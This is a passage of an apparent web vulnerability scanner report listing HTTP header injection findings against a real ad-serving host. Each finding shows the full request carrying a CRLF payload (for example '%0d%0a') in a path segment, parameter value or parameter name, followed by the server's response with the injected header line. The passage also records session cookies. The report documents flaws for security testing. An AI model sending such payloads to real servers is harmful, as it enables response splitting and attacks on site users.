Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aCnFkjO5nPuBPRokUUrOvKVAnOUHaTCPu54jkhQg4Zdv4XjIWPMVt7Za1qyQnUqkGWOMZahIDRsgV2eNZbmmjGmtMcNsGiJGVAcwsPq64IYujFJuRwu8jAcNcWaqHLgZapPUhaFdff7gIcwUoJTr7QxH0AiDg2j3Zac1wm0XZag0cxCFStF2hn1A7HNyvrrgM3ZdFYqBLfNC9pacvCrt88V9WHseTW8XjH0hK8MQRJUSqeTxAxYquIRmTkXZbHOLXnnqi91VSW6CnTn9XXgP25mVkrZcU0OFOvvZcpPZdGCmwqKtMD7YZcrQ7ujI20juZdeLDZbJmEGhAhZb7Vm3YeTgbuAVuQ06LYsPpGLOPO0KCHL2wA2knGyDnBRD6W5TMhZa0boaS62np61TZdQyTrbnfMKpeuQW9SWH9YcZbwg9QJ3t6UvnLBYo4M7hojbYOMpnxpaplhovgnB3FJEawsq8L3oIIjXdxtcfpQZbWBfN9fJZdt6rqKAlo4SZaI0YOQyaEUtJZceQpBUK35xM6j0j9QZbZaedOcrOEYoQcbX5VwN6ychrDaoZdltVtLQawGpMgals5NUbPRqOQvvERDUNYilTDF2LFE; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:59 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/7265f
8acca6d500f/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9300b%0d%0a0bad28ce6f1 was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/9300b%0d%0a0bad28ce6f1/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aqnFkjmMZaEu9XqwOyBTZaZam38IZcYUv8BQiOWLCpMIcI3kMvIGQ6SF36PVM6MAqa7bcRZcLPOwcRDUeRPpP2HMG7ZdrHcjlb85ZdwoCnoVkmyBudgcaTBb1LkVN6s826LtZcT4eAZcf7BBfKbRmMEYCX1FZdysa0IdRKkUpRw5HKkg17fund6ZdnNT2ZaI2uMaClXYa4xcSqrUdBkQQZcpV8tOQGsMuvq9NZbF4jNFs68T3Tm0mxYTS7EBP9by159hKgFytediP8DOHnQXiwbNPNWV4O20qfKOq1AOOCRmBnkTDQQ1ZbxsorQ3vIZb1mMMVdD5IBIShKZaOuvoMBTyw3jJVTZaYAwXx7llAZcmNyfrI6iNRYyv6UH3yyQTJptrm7KU16QFLxqaFUw3vMrjQC2cilwbHZdm4d7Za0W30t1G1Ok21QZaKvGR3CHYhHb1MVbGuRSk99QuqWyCG9ydM9cvWF6Ehvdk4TuC03w8eXDhZbJDHNFw3dr07eIDsrEAjGGG1ZbwrdAdNP2OvWhhvyTZbJBe317OcQTYtZaZaNbZdEh450vQvEZak9sNjMyVaLwZcTK85lTuU6IS01ur4VUe64ntVx22B7; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:18 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/9300b
0bad28ce6f1/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 9 is copied into the Location response header. The payload 64110%0d%0a7baeb896275 was submitted in the REST URL parameter 9. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/64110%0d%0a7baeb896275/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aWnFkjujie4R7Yx039x3UbQmfPRT7ZdCH2B22Zcf00DaT2mgHWUt2EZbi1cIXypihaF5uKxuE3Fcd1uHU0pjEwc2XtE8mZctg1IOkiVRpKThvRZcJkmOSUnZaZcl8la1lg4Zd1p2ESc0Y6I0wZbQoBJtCq7GNXuCLE72O0esQ8VciKVxP3tXWmNw0yZcZbJjSwnsgM2j6MmtGyS53eAbAXU0fS95Xq3J9hIBx0ZdRvm6RL4p63NhbnPq28QmuQTNDQIZc6fuihBSTltLSa4agFRsZdkx50Mu1uSguJ77qDK3Cd4gIG3BgfS4y9PgH25doyGhIOMvJ6pFJ5BSsZbfl1YfJHGBJm9L1yBRuCZbq93xOZadf8yN22EnPbVUo23XbF0cgiHlDyun72PoungUGUmLlVEiuYK7mo38MNYxLx3IkLSYXJFh58kMppVCtrgsoZbTvS8FasbMQRryArXUqb4bQTTKAw5moc7iSuKr6kZdUJhlxuFKCaRKccXOSsQXZcHU1sC1U3CD1FSxrwe3UqXlyH6ZbxZbYWevXRjkQqVQdZaNEoP7fZduSIrwncnskVHcHnPNPl07X5QhZbZb5bZa3rNJ3Y523o5; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:34 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/64110
7baeb896275/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr request parameter is copied into the Location response header. The payload 7f89d%0d%0a3c0d66486b9 was submitted in the http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=7f89d%0d%0a3c0d66486b9 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a5nF4hsjyFApJZby9BqdiWQSLuXsWaAeadHof0hlHdVOxo3w7HL31fWVFPwY1Za0UZblt9rdZb2muhD66YHhoRGuyZcPJkP6q4gcYfhsa6UcywsZcxW2shg3leABTZbRI7ZcKfSFTwF1L6dUZchFJGGZbj7WJvrOgPds0KAGaLZcmZadpY4LgLol4E3P5BT1j0iRfQoyc1t7oCQSfXcFPQgqN27G9paG78CTokOY9iZcfZbZaZdlTZdlMFKeZcijOfZblh4ZdwobCJWuRHw2OHiM3rJo5wfVXqinZdIjFDwbPxFAj9QnK53ctaOlpRKNBk9dCvwJCAZaDo5vqYZcocv36JXdQtk0wmr6FYo8kfWC3j05c52LVJ1a4YcaSZddhowA4CcXaxui5o96cJTZalKRngm7tZdOZdufesWsVin64cbNAe5nekoFxhvlBZcgBldlvZaitAgijrVOlZcfeFTfO0PC4IYnm77F2QZayB5OFRGlmwSE81jQ18F4m1VZdpbkrB4mJ7A5FhPm4IjS6NZa4Zdt0ZcLZaoeIUNdRb7ZbunflsJZcnV6K78y29QHhdROfPJfBq5VQWb97AZaygA3wDbZa5ZaOUahwZdWQE79xTqyr0; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:07 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=7f89d
3c0d66486b9
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 360e7%0d%0ab239a5c1971 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?360e7%0d%0ab239a5c1971=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=amnFciy4Zaw57A9MZdJSniFWrVJyqqMW8PmwTOGURXZcKVvUT7V3KRVjYSTZaLr9EXFa45Ff2q2VosRMGwwPygpqvVwTRKEGclAlCXuDg9XfbwC2hauVBwGKcU7V53b2ZdITZaQsJZdJCHv8Y2PZbXOm2dKKyXduyqPOoQNpDsBXZck2Cr8xEXoqI6jALbTtskA1OjxxpNdURkqgoqCrcGu5mlIyengZcluS42cDv9sXVQiLOueqTnm2XSuW02HFiL3esfSW0mWBIPyF6YbAtyZdBYZdfIQJDX2lBZbR9VF8moQAbUM8h4mNGrT73W0ykcZcpfQkbtXaZd1OUZbChL0XZdxfLSx0263BVXkie3MHLEwt7buALVkCZdTvI8q9QL8SmTDnZaZbrdPbkU15EIFpUkgp37VodUHZa2fR7IrIlPnR66xB3FGoqvxggFZbRdjqg2dwgHTRSF5WievahsxjXqfsUt0eZdpUjJJbrm6DZamlgYnDHIBsOa1HWkKq64Y4DWmV4opSrfcVLnyAjDumFG7fyOOZbYqfdUOWscQvaHS9JQCxT5ZbcRE8GqG0dAlwwhcBOm3XaubDV0Q7VrBwiEfbWnGdLi; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:11 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?360e7
b239a5c1971=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The value of the 7987e request parameter is copied into the Location response header. The payload 308ef%0d%0a21d4ff118f0 was submitted in the 7987e parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e308ef%0d%0a21d4ff118f0 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://burp/show/25
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=abnEV8xlqZbCpq4OSQ4eY8OW3wt6fZaIa5Zby32Ak5ZdPJc5fUXoI7ZafZa03falwgxkVn2F01y0pQFuYySZbChDrwlqjyBuJpN0jrf59pZcJ4cfCMdBIK8Zb6PD9sA3poqFQNdTdaNfvk9odLu1OK5XqVS5VVTZbWLB5NZbTjwlU8Tr95Roreos6dayunkSQEjZarU4rF1pZdKkKgUJQt7jQZccnPnSJao4u9MCcy7oErV3uWUa9Sm5WaK7B1ZdJ4T42yRCGFDcpFbBagwNcUQfCuHUu7mYZdkYaZbINh8m5NO6Hq4mwv6MUWeLPCe44cZbOQr1k8ZcQZdmZdaZaHZcnHhGIaT1UkluZbaQ3g15FjjKh95KgiGRXpVMPPJB7tCma8lpdZcaI7N365BWUvPQuHwidjCibqLUlpyZdxtn3A1Pmkwntr6bQbPL9NRvPlLjU19G71nph19MWLM6kUZbftXjZaK4TZdm4qSZd6veZaRCghc3VHan4WVJZaZc8r1KMN7QXikWRWeabQ59pyU788MVCexGQPEBbEn4ORHGGZbyqXGX9F1utXCPlhYZd31Za1vRcZcuOEywxn4jlWrZdVJRsOFc2G

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a2nEV8P3rRZaAQIrSnMaYwZd1ZcH3CvTkbNFQRlZaFmkTVekMvn8mUKG3Lnp3wlDqQX2AVM1eL4U7XrZbCJliSwV45eHTYTw58OLKjGXLXSvxHs7IKtgZb00lG8N0lkNJZaVvBLw4ApNXEQ2DudW21j6ZaOOH6NZcaeqsJAcOrkooOAucU38gofCcsr4EZbDtkNTmQjBZcDXd6VG8SImgG1NOTeuuHE9WC25Pjk7c6dJ3rpn88KdZaVKIPVfmZd7DLXkRP6R0cidt6lkOwgOeI3cymkhSvi8YNnE1WXTDcIbDBDOHtLCmTtF7VAtZc4vjnJ0bJS9ZdaXj2qN821R1BPOrC4fZbvjYQgjNrjxXTV183BZbFDA0HtOVbBpN7Mft9EfYnx1F8oQ8Zbn0L1SlW1DpZaFqWPyQfdwmW2KlUZdaeSxIvBnHhxGIYnh1WWxFgSpaE54ZdXLVpRsi2W6bh1SK4ISdPgbZc0yj4Xl3Y57YZdpJqJuxpTrOYbZciUQkTZdF64b6uDp654Kbv6h2I96ZbohGWxdtxJgEfFBRZbA8usZdAnq7vsfNxQLvx7VKFVnZbVtfvHlP5AtWJ5HCm1xI; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:42 GMT;
Content-Type: text/html
Location: ?7987e308ef
21d4ff118f0
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7987e%0d%0a05abc341081 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e%0d%0a05abc341081=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=abnEV8xlqZbCpq4OSQ4eY8OW3wt6fZaIa5Zby32Ak5ZdPJc5fUXoI7ZafZa03falwgxkVn2F01y0pQFuYySZbChDrwlqjyBuJpN0jrf59pZcJ4cfCMdBIK8Zb6PD9sA3poqFQNdTdaNfvk9odLu1OK5XqVS5VVTZbWLB5NZbTjwlU8Tr95Roreos6dayunkSQEjZarU4rF1pZdKkKgUJQt7jQZccnPnSJao4u9MCcy7oErV3uWUa9Sm5WaK7B1ZdJ4T42yRCGFDcpFbBagwNcUQfCuHUu7mYZdkYaZbINh8m5NO6Hq4mwv6MUWeLPCe44cZbOQr1k8ZcQZdmZdaZaHZcnHhGIaT1UkluZbaQ3g15FjjKh95KgiGRXpVMPPJB7tCma8lpdZcaI7N365BWUvPQuHwidjCibqLUlpyZdxtn3A1Pmkwntr6bQbPL9NRvPlLjU19G71nph19MWLM6kUZbftXjZaK4TZdm4qSZd6veZaRCghc3VHan4WVJZaZc8r1KMN7QXikWRWeabQ59pyU788MVCexGQPEBbEn4ORHGGZbyqXGX9F1utXCPlhYZd31Za1vRcZcuOEywxn4jlWrZdVJRsOFc2G; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:15 GMT;
Content-Type: text/html
Location: ?7987e
05abc341081=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 87fcc%0d%0a3c02d47cd03 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

